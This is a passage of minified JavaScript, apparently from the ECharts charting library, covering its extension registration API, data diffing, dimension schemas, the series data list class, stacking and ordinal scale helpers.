yx=[],mx={registerPreprocessor:nx,registerProcessor:ix,registerPostInit:rx,registerPostUpdate:ox,registerUpdateLifecycle:ax,registerAction:sx,registerCoordinateSystem:lx,registerLayout:ux,registerVisual:cx,registerTransform:gx,registerLoading:dx,registerMap:fx,registerImpl:function(t,e){lm[t]=e},PRIORITY:r_,ComponentModel:kf,ComponentView:ay,SeriesModel:Qv,ChartView:cy,registerComponentModel:function(t){kf.registerClass(t)},registerComponentView:function(t){ay.registerClass(t)},registerSeriesModel:function(t){Qv.registerClass(t)},registerChartView:function(t){cy.registerClass(t)},registerCustomSeries:function(t,e){},registerSubTypeDefaulter:function(t,e){kf.registerSubTypeDefaulter(t,e)},registerPainter:function(t,e){mo(t,e)}};function _x(t){Y(t)?E(t,function(t){_x(t)}):R(yx,t)>=0||(yx.push(t),X(t)&&(t={install:t}),t.install(mx))}function xx(t){return null==t?0:t.length||1}function bx(t){return t}var Sx=function(){function t(t,e,n,i,r,o){this._old=t,this._new=e,this._oldKeyGetter=n||bx,this._newKeyGetter=i||bx,this.context=r,this._diffModeMultiple="multiple"===o}return t.prototype.add=function(t){return this._add=t,this},t.prototype.update=function(t){return this._update=t,this},t.prototype.updateManyToOne=function(t){return this._updateManyToOne=t,this},t.prototype.updateOneToMany=function(t){return this._updateOneToMany=t,this},t.prototype.updateManyToMany=function(t){return this._updateManyToMany=t,this},t.prototype.remove=function(t){return this._remove=t,this},t.prototype.execute=function(){this[this._diffModeMultiple?"_executeMultiple":"_executeOneToOne"]()},t.prototype._executeOneToOne=function(){var t=this._old,e=this._new,n={},i=new Array(t.length),r=new Array(e.length);this._initIndexMap(t,null,i,"_oldKeyGetter"),this._initIndexMap(e,n,r,"_newKeyGetter");for(var o=0;o<t.length;o++){var a=i[o],s=n[a],l=xx(s);if(l>1){var u=s.shift();1===s.length&&(n[a]=s[0]),this._update&&this._update(u,o)}else 1===l?(n[a]=null,this._update&&this._update(s,o)):this._remove&&this._remove(o)}this._performRestAdd(r,n)},t.prototype._executeMultiple=function(){var t=this._old,e=this._new,n={},i={},r=[],o=[];this._initIndexMap(t,n,r,"_oldKeyGetter"),this._initIndexMap(e,i,o,"_newKeyGetter");for(var a=0;a<r.length;a++){var s=r[a],l=n[s],u=i[s],c=xx(l),h=xx(u);if(c>1&&1===h)this._updateManyToOne&&this._updateManyToOne(u,l),i[s]=null;else if(1===c&&h>1)this._updateOneToMany&&this._updateOneToMany(u,l),i[s]=null;else if(1===c&&1===h)this._update&&this._update(u,l),i[s]=null;else if(c>1&&h>1)this._updateManyToMany&&this._updateManyToMany(u,l),i[s]=null;else if(c>1)for(var p=0;p<c;p++)this._remove&&this._remove(l[p]);else this._remove&&this._remove(l)}this._performRestAdd(o,i)},t.prototype._performRestAdd=function(t,e){for(var n=0;n<t.length;n++){var i=t[n],r=e[i],o=xx(r);if(o>1)for(var a=0;a<o;a++)this._add&&this._add(r[a]);else 1===o&&this._add&&this._add(r);e[i]=null}},t.prototype._initIndexMap=function(t,e,n,i){for(var r=this._diffModeMultiple,o=0;o<t.length;o++){var a="_ec_"+this[i](t[o],o);if(r||(n[o]=a),e){var s=e[a],l=xx(s);0===l?(e[a]=o,r&&n.push(a)):1===l?e[a]=[s,o]:s.push(o)}}},t}(),Mx=function(){function t(t,e){this._encode=t,this._schema=e}return t.prototype.get=function(){return{fullDimensions:this._getFullDimensionNames(),encode:this._encode}},t.prototype._getFullDimensionNames=function(){return this._cachedDimNames||(this._cachedDimNames=this._schema?this._schema.makeOutputDimensionNames():[]),this._cachedDimNames},t}();function Tx(t,e){return t.hasOwnProperty(e)||(t[e]=[]),t[e]}var kx=function(t){this.otherDims={},null!=t&&A(this,t)},Cx=Ta(),Ix={float:"f",int:"i",ordinal:"o",number:"n",time:"t"},Dx=function(){function t(t){this.dimensions=t.dimensions,this._dimOmitted=t.dimensionOmitted,this.source=t.source,this._fullDimCount=t.fullDimensionCount,this._updateDimOmitted(t.dimensionOmitted)}return t.prototype.isDimensionOmitted=function(){return this._dimOmitted},t.prototype._updateDimOmitted=function(t){this._dimOmitted=t,t&&(this._dimNameMap||(this._dimNameMap=Lx(this.source)))},t.prototype.getSourceDimensionIndex=function(t){return at(this._dimNameMap.get(t),-1)},t.prototype.getSourceDimension=function(t){var e=this.source.dimensionsDefine;if(e)return e[t]},t.prototype.makeStoreSchema=function(){for(var t=this._fullDimCount,e=Gg(this.source),n=!Ox(t),i="",r=[],o=0,a=0;o<t;o++){var s=void 0,l=void 0,u=void 0,c=this.dimensions[a];if(c&&c.storeDimIndex===o)s=e?c.name:null,l=c.type,u=c.ordinalMeta,a++;else{var h=this.getSourceDimension(o);h&&(s=e?h.name:null,l=h.type)}r.push({property:s,type:l,ordinalMeta:u}),!e||null==s||c&&c.isCalculationCoord||(i+=n?s.replace(/\`/g,"`1").replace(/\$/g,"`2"):s),i+="$",i+=Ix[l]||"f",u&&(i+=u.uid),i+="$"}var p=this.source;return{dimensions:r,hash:[p.seriesLayoutBy,p.startIndex,i].join("$$")}},t.prototype.makeOutputDimensionNames=function(){for(var t=[],e=0,n=0;e<this._fullDimCount;e++){var i=void 0,r=this.dimensions[n];if(r&&r.storeDimIndex===e)r.isCalculationCoord||(i=r.name),n++;else{var o=this.getSourceDimension(e);o&&(i=o.name)}t.push(i)}return t},t.prototype.appendCalculationDimension=function(t){this.dimensions.push(t),t.isCalculationCoord=!0,this._fullDimCount++,this._updateDimOmitted(!0)},t}();function Ax(t){return t instanceof Dx}function Px(t){for(var e=mt(),n=0;n<(t||[]).length;n++){var i=t[n],r=$(i)?i.name:i;null!=r&&null==e.get(r)&&e.set(r,n)}return e}function Lx(t){var e=Cx(t);return e.dimNameMap||(e.dimNameMap=Px(t.dimensionsDefine))}function Ox(t){return t>30}var Rx,Nx,Bx,zx,Ex,Vx,Fx,Hx=$,Gx=V,Wx="undefined"==typeof Int32Array?Array:Int32Array,Ux=["hasItemOption","_nameList","_idList","_invertedIndicesMap","_dimSummary","userOutput","_rawData","_dimValueGetter","_nameDimIdx","_idDimIdx","_nameRepeatCount"],Zx=["_approximateExtent"],Yx=function(){function t(t,e){var n;this.type="list",this._dimOmitted=!1,this._nameList=[],this._idList=[],this._visual={},this._layout={},this._itemVisuals=[],this._itemLayouts=[],this._graphicEls=[],this._approximateExtent={},this._calculationInfo={},this.hasItemOption=!1,this.TRANSFERABLE_METHODS=["cloneShallow","downSample","minmaxDownSample","lttbDownSample","map"],this.CHANGABLE_METHODS=["filterSelf","selectRange"],this.DOWNSAMPLE_METHODS=["downSample","minmaxDownSample","lttbDownSample"];var i=!1;Ax(t)?(n=t.dimensions,this._dimOmitted=t.isDimensionOmitted(),this._schema=t):(i=!0,n=t),n=n||["x","y"];for(var r={},o=[],a={},s=!1,l={},u=0;u<n.length;u++){var c=n[u],h=j(c)?new kx({name:c}):c instanceof kx?c:new kx(c),p=h.name;h.type=h.type||"float",h.coordDim||(h.coordDim=p,h.coordDimIndex=0);var d=h.otherDims=h.otherDims||{};o.push(p),r[p]=h,null!=l[p]&&(s=!0),h.createInvertedIndices&&(a[p]=[]),i&&(h.storeDimIndex=u),0===d.itemName&&(this._nameDimIdx=h.storeDimIndex),0===d.itemId&&(this._idDimIdx=h.storeDimIndex)}if(this.dimensions=o,this._dimInfos=r,this._initGetDimensionInfo(s),this.hostModel=e,this._invertedIndicesMap=a,this._dimOmitted){var f=this._dimIdxToName=mt();E(o,function(t){f.set(r[t].storeDimIndex,t)})}}return t.prototype.getDimension=function(t){var e=this._recognizeDimIndex(t);if(null==e)return t;if(e=t,!this._dimOmitted)return this.dimensions[e];var n=this._dimIdxToName.get(e);if(null!=n)return n;var i=this._schema.getSourceDimension(e);return i?i.name:void 0},t.prototype.getDimensionIndex=function(t){var e=this._recognizeDimIndex(t);if(null!=e)return e;if(null==t)return-1;var n=this._getDimInfo(t);return n?n.storeDimIndex:this._dimOmitted?this._schema.getSourceDimensionIndex(t):-1},t.prototype._recognizeDimIndex=function(t){if(K(t)||null!=t&&!isNaN(t)&&!this._getDimInfo(t)&&(!this._dimOmitted||this._schema.getSourceDimensionIndex(t)<0))return+t},t.prototype._getStoreDimIndex=function(t){var e=this.getDimensionIndex(t);return e},t.prototype.getDimensionInfo=function(t){return this._getDimInfo(this.getDimension(t))},t.prototype._initGetDimensionInfo=function(t){var e=this._dimInfos;this._getDimInfo=t?function(t){return e.hasOwnProperty(t)?e[t]:void 0}:function(t){return e[t]}},t.prototype.getDimensionsOnCoord=function(){return this._dimSummary.dataDimsOnCoord.slice()},t.prototype.mapDimension=function(t,e){var n=this._dimSummary;if(null==e)return n.encodeFirstDimNotExtra[t];var i=n.encode[t];return i?i[e]:null},t.prototype.mapDimensionsAll=function(t){return(this._dimSummary.encode[t]||[]).slice()},t.prototype.getStore=function(){return this._store},t.prototype.initData=function(t,e,n){var i,r=this;if(t instanceof Dv&&(i=t),!i){var o=this.dimensions,a=Bg(t)||z(t)?new Wg(t,o.length):t;i=new Dv;var s=Gx(o,function(t){return{type:r._dimInfos[t].type,property:t}});i.initData(a,s,n)}this._store=i,this._nameList=(e||[]).slice(),this._idList=[],this._nameRepeatCount={},this._doInit(0,i.count()),this._dimSummary=function(t,e){var n={},i=n.encode={},r=mt(),o=[],a=[],s={};E(t.dimensions,function(e){var n,l=t.getDimensionInfo(e),u=l.coordDim;if(u){var c=l.coordDimIndex;Tx(i,u)[c]=e,l.isExtraCoord||(r.set(u,1),"ordinal"!==(n=l.type)&&"time"!==n&&(o[0]=e),Tx(s,u)[c]=t.getDimensionIndex(l.name)),l.defaultTooltip&&a.push(e)}fu.each(function(t,e){var n=Tx(i,e),r=l.otherDims[e];null!=r&&!1!==r&&(n[r]=l.name)})});var l=[],u={};r.each(function(t,e){var n=i[e];u[e]=n[0],l=l.concat(n)}),n.dataDimsOnCoord=l,n.dataDimIndicesOnCoord=V(l,function(e){return t.getDimensionInfo(e).storeDimIndex}),n.encodeFirstDimNotExtra=u;var c=i.label;c&&c.length&&(o=c.slice());var h=i.tooltip;return h&&h.length?a=h.slice():a.length||(a=o.slice()),i.defaultedLabel=o,i.defaultedTooltip=a,n.userOutput=new Mx(s,e),n}(this,this._schema),this.userOutput=this._dimSummary.userOutput},t.prototype.appendData=function(t){var e=this._store.appendData(t);this._doInit(e[0],e[1])},t.prototype.appendValues=function(t,e){var n=this._store.appendValues(t,e&&e.length),i=n.start,r=n.end,o=this._shouldMakeIdFromName();if(this._updateOrdinalMeta(),e)for(var a=i;a<r;a++){var s=a-i;this._nameList[a]=e[s],o&&Fx(this,a)}},t.prototype._updateOrdinalMeta=function(){for(var t=this._store,e=this.dimensions,n=0;n<e.length;n++){var i=this._dimInfos[e[n]];i.ordinalMeta&&t.collectOrdinalMeta(i.storeDimIndex,i.ordinalMeta)}},t.prototype._shouldMakeIdFromName=function(){var t=this._store.getProvider();return null==this._idDimIdx&&t.getSource().sourceFormat!==_u&&!t.fillStorage},t.prototype._doInit=function(t,e){if(!(t>=e)){var n=this._store.getProvider();this._updateOrdinalMeta();var i=this._nameList,r=this._idList;if(n.getSource().sourceFormat===gu&&!n.pure)for(var o=[],a=t;a<e;a++){var s=n.getItem(a,o);if(!this.hasItemOption&&ya(s)&&(this.hasItemOption=!0),s){var l=s.name;null==i[a]&&null!=l&&(i[a]=ba(l,null));var u=s.id;null==r[a]&&null!=u&&(r[a]=ba(u,null))}}if(this._shouldMakeIdFromName())for(a=t;a<e;a++)Fx(this,a);Rx(this)}},t.prototype.getApproximateExtent=function(t,e){return this._approximateExtent[t]||this._store.getDataExtent(this._getStoreDimIndex(t),e)},t.prototype.setApproximateExtent=function(t,e){e=this.getDimension(e),this._approximateExtent[e]=t.slice()},t.prototype.getCalculationInfo=function(t){return this._calculationInfo[t]},t.prototype.setCalculationInfo=function(t,e){Hx(t)?A(this._calculationInfo,t):this._calculationInfo[t]=e},t.prototype.getName=function(t){var e=this.getRawIndex(t),n=this._nameList[e];return null==n&&null!=this._nameDimIdx&&(n=Bx(this,this._nameDimIdx,e)),null==n&&(n=""),n},t.prototype._getCategory=function(t,e){var n=this._store.get(t,e),i=this._store.getOrdinalMeta(t);return i?i.categories[n]:n},t.prototype.getId=function(t){return Nx(this,this.getRawIndex(t))},t.prototype.count=function(){return this._store.count()},t.prototype.get=function(t,e){var n=this._store,i=this._dimInfos[t];if(i)return n.get(i.storeDimIndex,e)},t.prototype.getByRawIndex=function(t,e){var n=this._store,i=this._dimInfos[t];if(i)return n.getByRawIndex(i.storeDimIndex,e)},t.prototype.getIndices=function(){return this._store.getIndices()},t.prototype.getDataExtent=function(t){return this._store.getDataExtent(this._getStoreDimIndex(t),null)},t.prototype.getSum=function(t){return this._store.getSum(this._getStoreDimIndex(t))},t.prototype.getMedian=function(t){return this._store.getMedian(this._getStoreDimIndex(t))},t.prototype.getValues=function(t,e){var n=this,i=this._store;return Y(t)?i.getValues(Gx(t,function(t){return n._getStoreDimIndex(t)}),e):i.getValues(t)},t.prototype.hasValue=function(t){for(var e=this._dimSummary.dataDimIndicesOnCoord,n=0,i=e.length;n<i;n++)if(isNaN(this._store.get(e[n],t)))return!1;return!0},t.prototype.indexOfName=function(t){for(var e=0,n=this._store.count();e<n;e++)if(this.getName(e)===t)return e;return-1},t.prototype.getRawIndex=function(t){return this._store.getRawIndex(t)},t.prototype.indexOfRawIndex=function(t){return this._store.indexOfRawIndex(t)},t.prototype.rawIndexOf=function(t,e){var n=t&&this._invertedIndicesMap[t];var i=n&&n[e];return null==i||isNaN(i)?-1:i},t.prototype.each=function(t,e,n){X(t)&&(n=e,e=t,t=[]);var i=n||this,r=Gx(zx(t),this._getStoreDimIndex,this);this._store.each(r,i?U(e,i):e)},t.prototype.filterSelf=function(t,e,n){X(t)&&(n=e,e=t,t=[]);var i=n||this,r=Gx(zx(t),this._getStoreDimIndex,this);return this._store=this._store.filter(r,i?U(e,i):e),this},t.prototype.selectRange=function(t){var e=this,n={};return E(W(t),function(i){var r=e._getStoreDimIndex(i);n[r]=t[i]}),this._store=this._store.selectRange(n),this},t.prototype.mapArray=function(t,e,n){X(t)&&(n=e,e=t,t=[]),n=n||this;var i=[];return this.each(t,function(){i.push(e&&e.apply(this,arguments))},n),i},t.prototype.map=function(t,e,n,i){var r=n||i||this,o=Gx(zx(t),this._getStoreDimIndex,this),a=Vx(this);return a._store=this._store.map(o,r?U(e,r):e),a},t.prototype.modify=function(t,e,n,i){var r=n||i||this;var o=Gx(zx(t),this._getStoreDimIndex,this);this._store.modify(o,r?U(e,r):e)},t.prototype.downSample=function(t,e,n,i){var r=Vx(this);return r._store=this._store.downSample(this._getStoreDimIndex(t),e,n,i),r},t.prototype.minmaxDownSample=function(t,e){var n=Vx(this);return n._store=this._store.minmaxDownSample(this._getStoreDimIndex(t),e),n},t.prototype.lttbDownSample=function(t,e){var n=Vx(this);return n._store=this._store.lttbDownSample(this._getStoreDimIndex(t),e),n},t.prototype.getRawDataItem=function(t){return this._store.getRawDataItem(t)},t.prototype.getItemModel=function(t){var e=this.hostModel,n=this.getRawDataItem(t);return new td(n,e,e&&e.ecModel)},t.prototype.diff=function(t){var e=this;return new Sx(t?t.getStore().getIndices():[],this.getStore().getIndices(),function(e){return Nx(t,e)},function(t){return Nx(e,t)})},t.prototype.getVisual=function(t){var e=this._visual;return e&&e[t]},t.prototype.setVisual=function(t,e){this._visual=this._visual||{},Hx(t)?A(this._visual,t):this._visual[t]=e},t.prototype.getItemVisual=function(t,e){var n=this._itemVisuals[t],i=n&&n[e];return null==i?this.getVisual(e):i},t.prototype.hasItemVisual=function(){return this._itemVisuals.length>0},t.prototype.ensureUniqueItemVisual=function(t,e){var n=this._itemVisuals,i=n[t];i||(i=n[t]={});var r=i[e];return null==r&&(Y(r=this.getVisual(e))?r=r.slice():Hx(r)&&(r=A({},r)),i[e]=r),r},t.prototype.setItemVisual=function(t,e,n){var i=this._itemVisuals[t]||{};this._itemVisuals[t]=i,Hx(e)?A(i,e):i[e]=n},t.prototype.clearAllVisual=function(){this._visual={},this._itemVisuals=[]},t.prototype.setLayout=function(t,e){Hx(t)?A(this._layout,t):this._layout[t]=e},t.prototype.getLayout=function(t){return this._layout[t]},t.prototype.getItemLayout=function(t){return this._itemLayouts[t]},t.prototype.setItemLayout=function(t,e,n){this._itemLayouts[t]=n?A(this._itemLayouts[t]||{},e):e},t.prototype.clearItemLayouts=function(){this._itemLayouts.length=0},t.prototype.setItemGraphicEl=function(t,e){!function(t,e,n,i){if(i){var r=hu(i);r.dataIndex=n,r.dataType=e,r.seriesIndex=t,r.ssrType="chart","group"===i.type&&i.traverse(function(i){var r=hu(i);r.seriesIndex=t,r.dataIndex=n,r.dataType=e,r.ssrType="chart"})}}(this.hostModel&&this.hostModel.seriesIndex,this.dataType,t,e),this._graphicEls[t]=e},t.prototype.getItemGraphicEl=function(t){return this._graphicEls[t]},t.prototype.eachItemGraphicEl=function(t,e){E(this._graphicEls,function(n,i){n&&t&&t.call(e,n,i)})},t.prototype.cloneShallow=function(e){return e||(e=new t(this._schema?this._schema:Gx(this.dimensions,this._getDimInfo,this),this.hostModel)),Ex(e,this),e._store=this._store,e},t.prototype.wrapMethod=function(t,e){var n=this[t];X(n)&&(this.__wrappedMethods=this.__wrappedMethods||[],this.__wrappedMethods.push(t),this[t]=function(){var t=n.apply(this,arguments);return e.apply(this,[t].concat(lt(arguments)))})},t.internalField=(Rx=function(t){var e=t._invertedIndicesMap;E(e,function(n,i){var r=t._dimInfos[i],o=r.ordinalMeta,a=t._store;if(o){n=e[i]=new Wx(o.categories.length);for(var s=0;s<n.length;s++)n[s]=-1;for(s=0;s<a.count();s++)n[a.get(r.storeDimIndex,s)]=s}})},Bx=function(t,e,n){return ba(t._getCategory(e,n),null)},Nx=function(t,e){var n=t._idList[e];return null==n&&null!=t._idDimIdx&&(n=Bx(t,t._idDimIdx,e)),null==n&&(n="e\0\0"+e),n},zx=function(t){return Y(t)||(t=null!=t?[t]:[]),t},Vx=function(e){var n=new t(e._schema?e._schema:Gx(e.dimensions,e._getDimInfo,e),e.hostModel);return Ex(n,e),n},Ex=function(t,e){E(Ux.concat(e.__wrappedMethods||[]),function(n){e.hasOwnProperty(n)&&(t[n]=e[n])}),t.__wrappedMethods=e.__wrappedMethods,E(Zx,function(n){t[n]=C(e[n])}),t._calculationInfo=A({},e._calculationInfo)},void(Fx=function(t,e){var n=t._nameList,i=t._idList,r=t._nameDimIdx,o=t._idDimIdx,a=n[e],s=i[e];if(null==a&&null!=r&&(n[e]=a=Bx(t,r,e)),null==s&&null!=o&&(i[e]=s=Bx(t,o,e)),null==s&&null!=a){var l=t._nameRepeatCount,u=l[a]=(l[a]||0)+1;s=a,u>1&&(s+="__ec__"+u),i[e]=s}})),t}();function Xx(t,e){Bg(t)||(t=Eg(t));var n=(e=e||{}).coordDimensions||[],i=e.dimensionsDefine||t.dimensionsDefine||[],r=mt(),o=[],a=function(t,e,n,i){var r=Math.max(t.dimensionsDetectedCount||1,e.length,n.length,i||0);return E(e,function(t){var e;$(t)&&(e=t.dimsDef)&&(r=Math.max(r,e.length))}),r}(t,n,i,e.dimensionsCount),s=e.canOmitUnusedDimensions&&Ox(a),l=i===t.dimensionsDefine,u=l?Lx(t):Px(i),c=e.encodeDefine;!c&&e.encodeDefaulter&&(c=e.encodeDefaulter(t,a));for(var h=mt(c),p=new Sv(a),d=0;d<p.length;d++)p[d]=-1;function f(t){var e=p[t];if(e<0){var n=i[t],r=$(n)?n:{name:n},a=new kx,s=r.name;null!=s&&null!=u.get(s)&&(a.name=a.displayName=s),null!=r.type&&(a.type=r.type),null!=r.displayName&&(a.displayName=r.displayName);var l=o.length;return p[t]=l,a.storeDimIndex=t,o.push(a),a}return o[e]}if(!s)for(d=0;d<a;d++)f(d);h.each(function(t,e){var n=da(t).slice();if(1===n.length&&!j(n[0])&&n[0]<0)h.set(e,!1);else{var i=h.set(e,[]);E(n,function(t,n){var r=j(t)?u.get(t):t;null!=r&&r<a&&(i[n]=r,v(f(r),e,n))})}});var g=0;function v(t,e,n){null!=fu.get(e)?t.otherDims[e]=n:(t.coordDim=e,t.coordDimIndex=n,r.set(e,!0))}E(n,function(t){var e,n,i,r;if(j(t))e=t,r={};else{e=(r=t).name;var o=r.ordinalMeta;r.ordinalMeta=null,(r=A({},r)).ordinalMeta=o,n=r.dimsDef,i=r.otherDims,r.name=r.coordDim=r.coordDimIndex=r.dimsDef=r.otherDims=null}var s=h.get(e);if(!1!==s){if(!(s=da(s)).length)for(var u=0;u<(n&&n.length||1);u++){for(;g<a&&null!=f(g).coordDim;)g++;g<a&&s.push(g++)}E(s,function(t,o){var a=f(t);if(l&&null!=r.type&&(a.type=r.type),v(L(a,r),e,o),null==a.name&&n){var s=n[o];!$(s)&&(s={name:s}),a.name=a.displayName=s.name,a.defaultTooltip=s.defaultTooltip}i&&L(a.otherDims,i)})}});var y=e.generateCoord,m=e.generateCoordCount,_=null!=m;m=y?m||1:0;var x=y||"value";function b(t){null==t.name&&(t.name=t.coordDim)}if(s)E(o,function(t){b(t)}),o.sort(function(t,e){return t.storeDimIndex-e.storeDimIndex});else for(var w=0;w<a;w++){var S=f(w);null==S.coordDim&&(S.coordDim=jx(x,r,_),S.coordDimIndex=0,(!y||m<=0)&&(S.isExtraCoord=!0),m--),b(S),null!=S.type||Wf(t,w)!==Bf&&(!S.isExtraCoord||null==S.otherDims.itemName&&null==S.otherDims.seriesName)||(S.type="ordinal")}return Ga(o,function(t){return t.name},function(t,e){e>0&&(t.name=t.name+(e-1))}),new Dx({source:t,dimensions:o,fullDimensionCount:a,dimensionOmitted:s})}function jx(t,e,n){if(n||e.hasKey(t)){for(var i=0;e.hasKey(t+i);)i++;t+=i}return e.set(t,!0),t}var qx=function(t){this.coordSysDims=[],this.axisMap=mt(),this.categoryAxisMap=mt(),this.coordSysName=t};var Kx={cartesian2d:function(t,e,n,i){var r=t.getReferringComponents("xAxis",Da).models[0],o=t.getReferringComponents("yAxis",Da).models[0];e.coordSysDims=["x","y"],n.set("x",r),n.set("y",o),$x(r)&&(i.set("x",r),e.firstCategoryDimIndex=0),$x(o)&&(i.set("y",o),null==e.firstCategoryDimIndex&&(e.firstCategoryDimIndex=1))},singleAxis:function(t,e,n,i){var r=t.getReferringComponents("singleAxis",Da).models[0];e.coordSysDims=["single"],n.set("single",r),$x(r)&&(i.set("single",r),e.firstCategoryDimIndex=0)},polar:function(t,e,n,i){var r=t.getReferringComponents("polar",Da).models[0],o=r.findAxisModel("radiusAxis"),a=r.findAxisModel("angleAxis");e.coordSysDims=["radius","angle"],n.set("radius",o),n.set("angle",a),$x(o)&&(i.set("radius",o),e.firstCategoryDimIndex=0),$x(a)&&(i.set("angle",a),null==e.firstCategoryDimIndex&&(e.firstCategoryDimIndex=1))},geo:function(t,e,n,i){e.coordSysDims=["lng","lat"]},parallel:function(t,e,n,i){var r=t.ecModel,o=r.getComponent("parallel",t.get("parallelIndex")),a=e.coordSysDims=o.dimensions.slice();E(o.parallelAxisIndex,function(t,o){var s=r.getComponent("parallelAxis",t),l=a[o];n.set(l,s),$x(s)&&(i.set(l,s),null==e.firstCategoryDimIndex&&(e.firstCategoryDimIndex=o))})},matrix:function(t,e,n,i){var r=t.getReferringComponents("matrix",Da).models[0];e.coordSysDims=["x","y"];var o=r.getDimensionModel("x"),a=r.getDimensionModel("y");n.set("x",o),n.set("y",a),i.set("x",o),i.set("y",a)}};function $x(t){return"category"===t.get("type")}function Qx(t,e,n){var i,r,o,a=(n=n||{}).byIndex,s=n.stackedCoordDimension;!function(t){return!Ax(t.schema)}(e)?(r=e.schema,i=r.dimensions,o=e.store):i=e;var l,u,c,h,p=!(!t||!t.get("stack")),d=!0;function f(t){return"ordinal"!==t.type&&"time"!==t.type}if(E(i,function(t,e){j(t)&&(i[e]=t={name:t}),f(t)||(d=!1)}),E(i,function(t,e){p&&!t.isExtraCoord&&(a||l||!t.ordinalMeta||(l=t),u||!f(t)||d&&("x"===t.coordDim||"angle"===t.coordDim)||s&&s!==t.coordDim||(u=t))}),!u||a||l||(a=!0),u){c="__\0ecstackresult_"+t.id,h="__\0ecstackedover_"+t.id,l&&(l.createInvertedIndices=!0);var g=u.coordDim,v=u.type,y=0;E(i,function(t){t.coordDim===g&&y++});var m={name:c,coordDim:g,coordDimIndex:y,type:v,isExtraCoord:!0,isCalculationCoord:!0,storeDimIndex:i.length},_={name:h,coordDim:h,coordDimIndex:y+1,type:v,isExtraCoord:!0,isCalculationCoord:!0,storeDimIndex:i.length+1};r?(o&&(m.storeDimIndex=o.ensureCalculationDimension(h,v),_.storeDimIndex=o.ensureCalculationDimension(c,v)),r.appendCalculationDimension(m),r.appendCalculationDimension(_)):(i.push(m),i.push(_))}return{stackedDimension:u&&u.name,stackedByDimension:l&&l.name,isStackedByIndex:a,stackedOverDimension:h,stackResultDimension:c}}function Jx(t,e){return!!e&&e===t.getCalculationInfo("stackedDimension")}function tb(t,e){return Jx(t,e)?t.getCalculationInfo("stackResultDimension"):e}function eb(t,e,n){n=n||{};var i,r=e.getSourceManager(),o=!1;t?(o=!0,i=Eg(t)):o=(i=r.getSource()).sourceFormat===gu;var a=function(t){var e=t.get("coordinateSystem"),n=new qx(e),i=Kx[e];if(i)return i(t,n,n.axisMap,n.categoryAxisMap),n}(e),s=function(t,e){var n,i=t.get("coordinateSystem"),r=sf.get(i);return e&&e.coordSysDims&&(n=V(e.coordSysDims,function(t){var n={name:t},i=e.axisMap.get(t);if(i){var r=i.get("type");n.type=function(t){return"category"===t?"ordinal":"time"===t?"time":"float"}(r)}return n})),n||(n=r&&(r.getDimensionsInfo?r.getDimensionsInfo():r.dimensions.slice())||["x","y"]),n}(e,a),l=n.useEncodeDefaulter,u=X(l)?l:l?Z(Ff,s,e):null,c=Xx(i,{coordDimensions:s,generateCoord:n.generateCoord,encodeDefine:e.getEncode(),encodeDefaulter:u,canOmitUnusedDimensions:!o}),h=function(t,e,n){var i,r;return n&&E(t,function(t,o){var a=t.coordDim,s=n.categoryAxisMap.get(a);s&&(null==i&&(i=o),t.ordinalMeta=s.getOrdinalMeta(),e&&(t.createInvertedIndices=!0)),null!=t.otherDims.itemName&&(r=!0)}),r||null==i||(t[i].otherDims.itemName=0),i}(c.dimensions,n.createInvertedIndices,a),p=o?null:r.getSharedDataStore(c),d=Qx(e,{schema:c,store:p}),f=new Yx(c,e);f.setCalculationInfo(d);var g=null!=h&&function(t){if(t.sourceFormat===gu){return!Y(va(function(t){var e=0;for(;e<t.length&&null==t[e];)e++;return t[e]}(t.data||[])))}}(i)?function(t,e,n,i){return i===h?n:this.defaultDimValueGetter(t,e,n,i)}:null;return f.hasItemOption=!1,f.initData(o?i:p,null,g),f}var nb=function(){function t(){}return t.prototype.isBlank=function(){return this._isBlank},t.prototype.setBlank=function(t){this._isBlank=t},t}();ns(nb);var ib=0,rb=function(){function t(t){this.categories=t.categories||[],this._needCollect=t.needCollect,this._deduplication=t.deduplication,this.uid=++ib,this._onCollect=t.onCollect}return t.createByAxisModel=function(e){var n=e.option,i=n.data,r=i&&V(i,ob);return new t({categories:r,needCollect:!r,deduplication:!1!==n.dedplication})},t.prototype.getOrdinal=function(t){return this._getOrCreateMap().get(t)},t.prototype.parseAndCollect=function(t){var e,n=this._needCollect;if(!j(t)&&!n)return t;if(n&&!this._deduplication)return e=this.categories.length,this.categories[e]=t,this._onCollect&&this._onCollect(t,e),e;var i=this._getOrCreateMap();return null==(e=i.get(t))&&(n?(e=this.categories.length,this.categories[e]=t,i.set(t,e),this._onCollect&&this._onCollect(t,e)):e=NaN),e},t.prototype._getOrCreateMap=function(){return this._map||(this._map=mt(this.categories))},t}();function ob(t){return $(t)&&null!=t.value?t.value:t+""}var ab=W({needTransform:1,normalize:1,scale:1,transformIn:1,transformOut:1,contain:1,getExtent:1,getExtentUnsafe:1,setExtent:1,setExtent2:1,getFilter:1,sanitize:1,getDefaultStartValue:1,freeze:1});function sb(t,e,n){var i;t=t||{};var r=pd();if(r){var o=r.createBreakScaleMapper(e,n);o.hasBreaks()&&(E(ab,function(e){o[e]&&(t[e]=U(o[e],o))}),i=o)}return null==i&&db(t,n),{brk:i,mapper:t}}function lb(t,e){E(ab,function(n){t[n]=e[n]})}function ub(t,e){t.freeze=St}function cb(t){return t.getExtentUnsafe(0,2)}function hb(t,e){return t.getExtentUnsafe(1,e)||t.getExtentUnsafe(0,e)}function pb(t){var e=t.getExtentUnsafe(0,3);return e[1]-e[0]}function db(t,e){var n=t||{},i=[];return n._extents=i,i[0]=e?e.slice():[1/0,-1/0],A(n,fb),n}var fb={needTransform:function(){return!1},normalize:function(t){var e=this._extents[1]||this._extents[0];return e[1]===e[0]?.5:(t-e[0])/(e[1]-e[0])},scale:function(t){var e=this._extents[1]||this._extents[0];return t*(e[1]-e[0])+e[0]},transformIn:function(t){return t},transformOut:function(t){return t},contain:function(t){var e=hb(this,null);return t>=e[0]&&t<=e[1]},getExtent:function(){return this._extents[0].slice()},getExtentUnsafe:function(t){return this._extents[t]},setExtent:function(t,e){gb(this._extents,0,t,e)},setExtent2:function(t,e,n){var i=this._extents;i[t]||(i[t]=i[0].slice()),gb(i,t,e,n)},freeze:function(){0}};function gb(t,e,n,i){Ea(n,i)&&(t[e][0]=n,t[e][1]=i)}function vb(t){return yb(t)||_b(t)}function yb(t){return"interval"===t.type}function mb(t){return"time"===t.type}function _b(t){return"log"===t.type}function xb(t){return"ordinal"===t.type}function bb(t){var e=Ko(t),n=Do(10,e),i=ko(t/n);return i?2===i?i=3:3===i?i=5:i*=2:i=1,zo(i*n,-e)}function wb(t){return Vo(t)+2}function Sb(t,e){return Ao(t)/Ao(e)}function Mb(t,e,n){var 